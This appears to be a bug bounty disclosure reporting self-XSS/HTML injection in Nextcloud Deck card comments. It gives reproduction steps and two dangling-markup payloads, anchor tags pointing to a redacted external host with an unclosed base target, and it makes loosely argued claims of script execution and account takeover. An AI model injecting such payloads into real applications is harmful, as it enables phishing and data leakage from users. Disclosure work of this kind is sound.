Self XSS when sending HTML as a comment in the Deck app

Hi Team, I hope you are doing well. I found an XSS/HTML Injection Via Comments in Deck Cards. Vulnerability Name :- XSS/HTML Injection Via Comments in Deck Cards Vulnerability Description :- Hi Team , I found an XSS/HTML Injection Via Comments in Deck Cards, which leads to One time Malicious Script execution . I performed my Testing on Localhost Latest version of Nextcloud 27.0.0.8. {F2481183} Steps to Reproduce :- 1. Setup the Nextcloud Instance Locally. 2. After setting up locally --> login. 3. After that Go to Deck --> Create Cards --> Click on that card --> Go to comments. 4. Enter this payload in comments :- <a href=http://██████/dangling_markup/name.html><font size=100 color=red>You must click me</font></a><base target=" 5. You can also use this --> <a href=http://███████/dangling_markup/name.html><font size=100 color=blue>You Hacked by BhaRat</font></a><base target=" 6. Put this script in comments and click and send and Boom! you see the one time execution. 7. Attacker can easily found a way to make it persistent or execute their malicious script once. ## Impact 1. Malicious Script Execution. 2. If attacker can able to make it persistent --> it leads to cookie stealing and account takeover. POC Attached If you need further info I am here to help you. Thanks and Regards, BhaRat